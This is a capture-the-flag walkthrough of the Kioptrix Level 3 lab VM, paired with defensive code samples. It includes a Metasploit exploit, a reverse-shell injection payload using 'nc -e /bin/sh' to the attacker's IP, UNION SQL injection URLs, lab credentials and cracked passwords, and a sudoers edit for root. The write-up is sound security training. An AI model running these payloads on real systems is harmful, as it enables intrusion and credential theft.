
VulnHub practice: Kioptrix Level 3

Discovering the target

As before, edit the virtual machine file KioptrixVM3.vmx and change ethernet0.connectionType = "bridged" to ethernet0.connectionType = "nat".

Scan the local network with sudo arp-scan -l; the target's IP is 192.168.80.18.

kali@kali:~$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1 00:50:56:c0:00:08 VMware, Inc.
192.168.80.2 00:50:56:fc:96:a7 VMware, Inc.
192.168.80.18 00:0c:29:ec:76:c0 VMware, Inc.
192.168.80.17 00:0c:29:fe:3a:82 VMware, Inc.
192.168.80.254 00:50:56:f8:e1:4e VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 5 responded

Nmap scan

Run sudo nmap -A -T5 -sS 192.168.80.18; the results are:

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 23:44 EST
Nmap scan report for 192.168.80.18
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:EC:76:C0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.12 ms 192.168.80.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds

The scan shows that the target has port 22 (SSH) and port 80 (HTTP) open.

Scanning for vulnerabilities

Run nikto -h 192.168.80.18; the results are:

kali@kali:~$ nikto -h 192.168.80.18
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.80.18
+ Target Hostname: 192.168.80.18
+ Target Port: 80
+ Start Time: 2020-02-24 23:51:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-02-24 23:52:27 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
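The header findings nikto lists above can be re-checked on any response without running nikto. The following is an added example, not part of the original write-up: a small Python audit that parses a raw HTTP response and reports the same conditions (PHPSESSID set without HttpOnly, missing X-Frame-Options, X-Content-Type-Options and X-XSS-Protection, and Server / X-Powered-By headers that carry version numbers). The two responses it runs on are constructed to resemble the Kioptrix 3 host before and after hardening; they are not captured traffic.

```python
"""Audit the security headers of an HTTP response.

Added example (not from the original write-up). It re-implements the header
checks nikto reported against Kioptrix 3: a session cookie without HttpOnly,
missing X-Frame-Options / X-Content-Type-Options / X-XSS-Protection, and
version disclosure in Server and X-Powered-By. Both responses below are
constructed samples, not captured traffic.
"""
from typing import Dict, List

# Constructed sample: headers as the vulnerable Apache/PHP stack would send them.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 24 Feb 2020 23:51:52 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.6\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed sample: the same stack after the headers were fixed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/; HttpOnly; Secure\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Split a raw response into a case-insensitive header map.

    Header names are lower-cased; repeated headers (several Set-Cookie lines,
    for instance) are kept as a list. The status line and body are ignored.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:  # [1:] skips the status line
        name, sep, value = line.partition(":")
        if not sep:
            continue
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def audit(raw: str) -> List[str]:
    """Return one finding string per weakness; an empty list means clean."""
    h = parse_headers(raw)
    findings: List[str] = []
    # Session cookies readable from script are what nikto's HttpOnly finding is about.
    for cookie in h.get("set-cookie", []):
        name = cookie.split("=", 1)[0]
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if "httponly" not in attrs:
            findings.append(f"cookie {name} set without HttpOnly")
    # The three response headers nikto reported as absent.
    for required in ("x-frame-options", "x-content-type-options", "x-xss-protection"):
        if required not in h:
            findings.append(f"missing {required}")
    # Any digit in these headers is a product version handed to the client.
    for leaky in ("server", "x-powered-by"):
        for value in h.get(leaky, []):
            if any(ch.isdigit() for ch in value):
                findings.append(f"{leaky} header discloses a version: {value}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print("before:", finding)
    print("after:", audit(HARDENED_RESPONSE) or "no findings")
```

On the VM's stack these are fixed with mod_headers Header directives (or session.cookie_httponly in php.ini for the cookie) and TraceEnable off for the TRACE finding. X-XSS-Protection is ignored by current browsers and is checked here only because nikto still reports it; a Content-Security-Policy is the present-day replacement.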

Setting up name resolution

Point the name kioptrix3.com at 192.168.80.18 on the attacking machine; the target is referred to by that name from here on.

Searching for framework vulnerabilities with searchsploit

Visiting the site's login page shows a notice that the site runs on the LotusCMS framework.

kali@kali:~$ searchsploit LotusCMS
----------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Background material on the vulnerability

Exploitation with Metasploit

Reverse shell, method one (msfconsole):

msf5 exploit(multi/http/lcms_php_exec) > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.80.18 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.80.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf5 exploit(multi/http/lcms_php_exec) > set RHOST kioptrix3.com
RHOST => kioptrix3.com
msf5 exploit(multi/http/lcms_php_exec) > run

[*] Started reverse TCP handler on 192.168.80.14:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38288 bytes) to 192.168.80.18
[*] Meterpreter session 1 opened (192.168.80.14:4444 -> 192.168.80.18:33134) at 2020-02-25 08:35:44 -0500

meterpreter > shell
Process 4855 created.
Channel 0 created.
whoami
www-data

Reverse shell, method two (PHP injection):

  1. Start a listener on port 5555 on the attacking machine:
    kali@kali:~$ nc -lnvp 5555
    listening on [any] 5555 ...
  2. Enter the payload in the browser:
    What does PHP's system function do?
    http://kioptrix3.com/index.php?page=index');${system('nc -e /bin/sh 192.168.80.14 5555')};#
    Note: 192.168.80.14 is the attacking machine's IP. The key is command injection through the page parameter, which sends a shell back to the attacking machine.
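Both reverse-shell methods drive the same flaw: LotusCMS passes the page parameter into eval(), so the request that carries the payload is recorded in the web server's access log. The following is an added example, not part of the original write-up, showing how a defender would pick those requests out of Apache combined-format logs: any page value that is not a plain page name is reported, and PHP code markers are named when present. The log lines are constructed; the addresses and the payload URL follow the write-up (192.168.80.14 is the attacking machine).

```python
"""Flag LotusCMS `page=` parameter abuse in Apache access logs.

Added example, not part of the original write-up. The log lines are
constructed in Apache combined format; 192.168.80.14 is the attacking
machine from the write-up and 192.168.80.17 a constructed ordinary visitor.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# A legitimate LotusCMS page name is a short token; anything else warrants a look.
LEGIT_PAGE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
# Markers of PHP code being smuggled into the eval() context.
PHP_EVAL_MARKERS = ("${", "system(", "exec(", "passthru(", "shell_exec(", "');")

# Constructed access-log sample (Apache combined format).
ACCESS_LOG = """\
192.168.80.17 - - [25/Feb/2020:08:30:01 -0500] "GET /index.php?page=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.80.17 - - [25/Feb/2020:08:30:05 -0500] "GET /index.php?page=blog HTTP/1.1" 200 4480 "-" "Mozilla/5.0"
192.168.80.14 - - [25/Feb/2020:08:35:44 -0500] "GET /index.php?page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2Fbin%2Fsh%20192.168.80.14%205555%27%29%7D%3B%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.80.14 - - [25/Feb/2020:08:35:50 -0500] "GET /index.php?page=index');${system('id')};# HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.80.17 - - [25/Feb/2020:08:36:10 -0500] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# source, [timestamp], "METHOD url proto", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def page_param(url: str) -> Optional[str]:
    """Return the decoded `page` parameter of a request URL, or None if absent."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("page")
    if not values:
        return None
    # parse_qs decodes once; decode again so double-encoded payloads are normalised.
    return unquote(values[0])


def classify(page: str) -> Optional[str]:
    """Return a reason string if the page value looks like code injection."""
    if LEGIT_PAGE.match(page):
        return None
    markers = [m for m in PHP_EVAL_MARKERS if m in page]
    if markers:
        return "php-eval-markers:" + ",".join(markers)
    return "unexpected-characters"


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (source, timestamp, reason) for every suspicious request."""
    hits: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        page = page_param(m.group("url"))
        if page is None:
            continue
        reason = classify(page)
        if reason:
            hits.append((m.group("src"), m.group("ts"), reason))
    return hits


if __name__ == "__main__":
    for src, ts, reason in scan(ACCESS_LOG):
        print(f"{ts} {src} {reason}")
```

The allow-list check (LEGIT_PAGE) does the real work; the marker list only labels the hit. That ordering matters because an attacker controls the payload's spelling but not the fact that a page name should never contain quotes, braces or parentheses.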
From this shell we look for useful information and find a file named gconfig.php; let's see what it contains:
    head -20 gconfig.php  # first 20 lines only; the whole file doesn't fit on one screen with cat
    <?php
    error_reporting(0);
    /*
    A sample Gallarific configuration file. You should edit
    the installer details below and save this file as gconfig.php
    Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
This configuration file gives us an important piece of information: the MySQL root credentials, root/fuckeyou.
So we connect to MySQL from the shell, find the users dreg and loneferret, and obtain the MD5 hashes of their passwords.
    # mysql -u root -p
    Enter password:
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 70
    Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql> show databases;
    +--------------------+
    | Database |
    +--------------------+
    | information_schema |
    | gallery |
    | mysql |
    +--------------------+
    3 rows in set (0.00 sec)

    mysql> use gallery
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed
    mysql> show tables;
    +----------------------+
    | Tables_in_gallery |
    +----------------------+
    | dev_accounts |
    | gallarific_comments |
    | gallarific_galleries |
    | gallarific_photos |
    | gallarific_settings |
    | gallarific_stats |
    | gallarific_users |
    +----------------------+
    7 rows in set (0.00 sec)

    mysql> select * from dev_accounts;
    +----+------------+----------------------------------+
    | id | username | password |
    +----+------------+----------------------------------+
    | 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
    | 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
    +----+------------+----------------------------------+
    2 rows in set (0.00 sec)
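The dev_accounts table stores each password as a plain, unsalted MD5 digest, which is why the hashes in this dump can be resolved with an online lookup later in the write-up. The following added example, not part of the original write-up, confirms the two digests from the dump against the plaintexts the write-up recovers, using a small constructed wordlist in place of the online service, and contrasts that with a salted, iterated hash (PBKDF2-HMAC-SHA256, an assumption about what the application should have used) under which the same password no longer yields a fixed digest.

```python
"""Why the dev_accounts hashes were trivially reversed.

Added example, not from the original write-up. An unsalted MD5 depends only
on the password, so one precomputed table resolves every user who chose a
common word. A salted, iterated hash ties each digest to a per-user random
salt, so no shared table exists and each guess costs a full key derivation.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

# The two rows as they appear in the dev_accounts dump above.
DEV_ACCOUNTS = [
    ("dreg", "0d3eccfb887aabd50f243b3f155c0f85"),
    ("loneferret", "5badcaf789d3d1d09794d8f021f40f0e"),
]

# Constructed stand-in for the online lookup table the write-up used.
WORDLIST = ["password", "123456", "starwars", "Mast3r", "letmein"]

PBKDF2_ROUNDS = 200_000


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def reverse_unsalted(digest: str, words) -> Optional[str]:
    """Reverse an unsalted MD5 by lookup: the digest depends only on the password."""
    table = {md5_hex(w): w for w in words}
    return table.get(digest.lower())


def resolve_dump() -> Dict[str, Optional[str]]:
    """Resolve every dev_accounts digest that appears in the wordlist."""
    return {user: reverse_unsalted(digest, WORDLIST) for user, digest in DEV_ACCOUNTS}


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                rounds: int = PBKDF2_ROUNDS) -> Tuple[bytes, bytes]:
    """Salted, iterated hash: the same password with a new salt gives a new digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt, digest


def pbkdf2_verify(password: str, salt: bytes, digest: bytes,
                  rounds: int = PBKDF2_ROUNDS) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = pbkdf2_hash(password, salt, rounds)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("unsalted MD5 resolved:", resolve_dump())
    s1, d1 = pbkdf2_hash("starwars")
    s2, d2 = pbkdf2_hash("starwars")
    print("same password, two salts, digests equal:", d1 == d2)
    print("verify with stored salt:", pbkdf2_verify("starwars", s1, d1))
```

Storing the salt beside the digest is intended; its job is to make the digest unique per user, not to stay secret. The cost parameter (rounds) is what slows a guess, and it should be tuned upward as hardware improves.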

Finding a URL vulnerable to SQL injection

Navigate: [now] → [Ligoat Press Room]
Enter ' (URL: http://kioptrix3.com/gallery/gallery.php?id=%27) to test whether an injection point exists:

SQL injection walkthrough

  3. Determine the number of columns
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 1-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 2-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 3-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 4-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 5-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- (No Error)
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 7-- (Error: Unknown Column)
    From these results we can tell the query returns 6 columns.
  4. Find which columns are displayed
    http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20all%20select%201,2,3,4,5,6--
    The result shows that the second and third columns are rendered in the page.
  5. Get the database version
    http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20all%20select%201,@@version,database(),4,5,6--
    The database version is 5.0.51a-3ubuntu5.4.
  6. List the tables in the current database
    http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,2,group_concat(table_name),4,5,6%20from%20information_schema.tables%20where%20table_schema=database()--
    The tables are: dev_accounts, gallarific_comments, gallarific_galleries, gallarific_photos, gallarific_settings, gallarific_stats, gallarific_users
  7. Get the column names of the dev_accounts table
    http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=CHAR(100,%20101,%20118,%2095,%2097,%2099,%2099,%20111,%20117,%20110,%20116,%20115)--
    Here table_name=dev_accounts was converted to its ASCII form with an online tool: table_name=char(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
  8. Retrieve the usernames and passwords
    http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts--
    Note that the colon separator is written as its ASCII value 0x3a.
    We now have the username and password hash of both users:
    dreg:0d3eccfb887aabd50f243b3f155c0f85
    loneferret:5badcaf789d3d1d09794d8f021f40f0e
    The passwords are MD5 hashes; an online lookup gives their plaintexts.
    The final credentials are:
    dreg:Mast3r
    loneferret:starwars
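Every step above works because gallery.php splices the id parameter straight into its SQL text, so a value of the form -1 union select ... becomes part of the query. The following added example (not code from the Kioptrix VM or from Gallarific) reproduces that pattern against an in-memory SQLite database, used here as a stand-in for the MySQL gallery database, and shows the parameterized version beside it. Table and column names follow the write-up; the dev_accounts rows are the ones from the dump above, and the photo rows are constructed.

```python
"""gallery.php?id= lookup: string-built SQL beside a parameterized query.

Added example, not code from the Kioptrix VM or from Gallarific. SQLite
stands in for the MySQL `gallery` database (assumption); the union payload
mirrors step 8 of the write-up with the MySQL-only pieces removed.
"""
import sqlite3
from typing import Dict, List, Tuple

# The shape of the payload used in step 8 above, minus MySQL-specific functions.
UNION_PAYLOAD = "-1 union select 1,username,password,4,5,6 from dev_accounts--"


def seed() -> sqlite3.Connection:
    """Build the stand-in database: six-column photo table plus dev_accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE gallarific_photos (id INTEGER, title TEXT, filename TEXT,
                                        galleryid INTEGER, views INTEGER, uploaded TEXT);
        INSERT INTO gallarific_photos VALUES (1, 'Goat 1', 'goat1.jpg', 1, 10, '2009-10-10');
        INSERT INTO gallarific_photos VALUES (2, 'Goat 2', 'goat2.jpg', 1, 3, '2009-10-11');
        CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """The pattern gallery.php follows: the request parameter is pasted into SQL.

    Because the attacker controls part of the statement, a UNION with the
    same column count (six, as step 3 established) returns arbitrary tables.
    """
    sql = "SELECT * FROM gallarific_photos WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Validate the type, then bind the value: the SQL text never changes.

    int() raises ValueError for 'order by', 'union select', quotes and so on;
    a web handler would turn that into a 400 response.
    """
    photo_id = int(raw_id)
    return conn.execute(
        "SELECT * FROM gallarific_photos WHERE id=?", (photo_id,)
    ).fetchall()


def demo() -> Dict[str, object]:
    """Run both lookups against the payload and a normal id."""
    conn = seed()
    leaked = lookup_vulnerable(conn, UNION_PAYLOAD)
    try:
        lookup_hardened(conn, UNION_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "normal": lookup_hardened(conn, "1"),
        "leaked_usernames": sorted(row[1] for row in leaked),
        "hardened_rejected": rejected,
    }


if __name__ == "__main__":
    result = demo()
    print("vulnerable lookup leaked:", result["leaked_usernames"])
    print("hardened lookup rejected payload:", result["hardened_rejected"])
    print("hardened lookup, id=1:", result["normal"])
```

Binding alone would also defeat the union payload, but validating the type first gives a clear error instead of a silent empty result. The other lesson from gconfig.php is privilege: the application connected as the MySQL root user, so a single injection exposed every database on the server rather than only gallery.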
  9. Log in over SSH as loneferret
    kali@kali:~$ ssh loneferret@192.168.80.18
    loneferret@192.168.80.18's password:
    Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    Last login: Tue Feb 25 10:45:22 2020 from localhost
Edit /etc/sudoers and append , /bin/sh after /usr/local/bin/ht. (Note: press Fn+F6 to enter edit mode, Alt+F to save, and Ctrl+Z to quit the editor.)
    loneferret@Kioptrix3:~$ export TERM=xterm  # this variable must be set before opening the editor
    loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Use sudo /bin/sh to get a root shell.
    loneferret@Kioptrix3:~$ sudo /bin/sh
    # whoami
    root
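The escalation above works because loneferret may run the ht editor as root, and an editor can rewrite /etc/sudoers itself, so that one rule is as good as a root shell. The following added example, not part of the original write-up, parses sudoers-style rules and flags any whose command is an editor, shell or interpreter, the check an administrator would run before granting such a rule. The sudoers text is constructed (the write-up does not show the VM's real file); the loneferret line is written the way a rule allowing only ht would look before the edit described above.

```python
"""Audit sudoers rules for commands that amount to a root shell.

Added example, not part of the original write-up. The sample file is
constructed; its loneferret rule is an assumption about how a rule allowing
only /usr/local/bin/ht would look, not a copy of the VM's /etc/sudoers.
"""
import re
from typing import List, Tuple

# Programs that hand the caller a shell or let it write arbitrary files as root.
# Matched on the basename of the first word of each command in a rule.
SHELL_OR_EDITOR = {
    "sh", "bash", "dash", "zsh", "ht", "vi", "vim", "nano", "less", "more",
    "python", "perl", "find", "awk", "tee", "cp", "mv",
}

# Constructed sample in /etc/sudoers syntax.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync
www-data ALL=(ALL) /usr/sbin/service apache2 restart
"""

# user  host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(r"^(?P<who>\S+)\s+\S+=\s*(?:\([^)]*\)\s*)?(?P<rest>.+)$")
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|SETENV|NOEXEC):")
NON_RULE_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text: str) -> List[Tuple[str, List[str], bool]]:
    """Return (user, [commands], nopasswd) for each user specification line."""
    rules: List[Tuple[str, List[str], bool]] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(NON_RULE_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        nopasswd = "NOPASSWD:" in rest
        rest = TAG_RE.sub("", rest)
        cmds = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append((m.group("who"), cmds, nopasswd))
    return rules


def findings(text: str) -> List[str]:
    """One line per rule that effectively grants root to a non-root user."""
    out: List[str] = []
    for user, cmds, nopasswd in parse_rules(text):
        for cmd in cmds:
            if cmd.startswith("!"):
                continue  # a negated entry grants nothing
            if cmd == "ALL":
                if user != "root":
                    out.append(f"{user}: unrestricted ALL")
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if prog in SHELL_OR_EDITOR:
                tag = " (no password)" if nopasswd else ""
                out.append(f"{user}: {cmd} can yield root{tag}")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE_SUDOERS):
        print(line)
```

The negated !/usr/bin/su entry in the sample illustrates why blacklisting one program is not a control: it says nothing about the editor next to it. Rules should name only commands that cannot spawn a shell or write files, and editing sudoers itself should go through visudo, which also syntax-checks the result.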
Find the flag:
    # cd /root
    # ls
    Congrats.txt ht-2.0.18
    # ls -la
    total 52
    drwx------ 5 root root 4096 2011-04-17 08:59 .
    drwxr-xr-x 21 root root 4096 2011-04-11 16:54 ..
    -rw------- 1 root root 9 2011-04-18 11:49 .bash_history
    -rw-r--r-- 1 root root 2227 2007-10-20 07:51 .bashrc
    -rw-r--r-- 1 root root 1327 2011-04-16 08:13 Congrats.txt
    drwxr-xr-x 12 root root 12288 2011-04-16 07:26 ht-2.0.18
    -rw------- 1 root root 963 2011-04-12 19:33 .mysql_history
    -rw------- 1 root root 228 2011-04-18 11:09 .nano_history
    -rw-r--r-- 1 root root 141 2007-10-20 07:51 .profile
    drwx------ 2 root root 4096 2011-04-13 10:06 .ssh
    drwxr-xr-x 3 root root 4096 2011-04-15 23:30 .subversion
    # cat Congrats.txt
    Good for you for getting here.
    Regardless of the matter (staying within the spirit of the game of course)
    you got here, congratulations are in order. Wasn't that bad now was it.

    Went in a different direction with this VM. Exploit based challenges are
    nice. Helps workout that information gathering part, but sometimes we
    need to get our hands dirty in other things as well.
    Again, these VMs are beginner and not intented for everyone.
    Difficulty is relative, keep that in mind.

    The object is to learn, do some research and have a little (legal)
    fun in the process.


    I hope you enjoyed this third challenge.

    Steven McElrea
    aka loneferret
    http://www.kioptrix.com


    Credit needs to be given to the creators of the gallery webapp and CMS used
    for the building of the Kioptrix VM3 site.

    Main page CMS:
    http://www.lotuscms.org

    Gallery application:
    Gallarific 2.1 - Free Version released October 10, 2009
    http://www.gallarific.com
    Vulnerable version of this application can be downloaded
    from the Exploit-DB website:
    http://www.exploit-db.com/exploits/15891/

    The HT Editor can be found here:
    http://hte.sourceforge.net/downloads.html
    And the vulnerable version on Exploit-DB here:
    http://www.exploit-db.com/exploits/17083/


    Also, all pictures were taken from Google Images, so being part of the
    public domain I used them.

Reference posts

https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
https://rastating.github.io/kioptrix-level-3-ctf-walkthrough/
https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Further reading: SQL injection explained

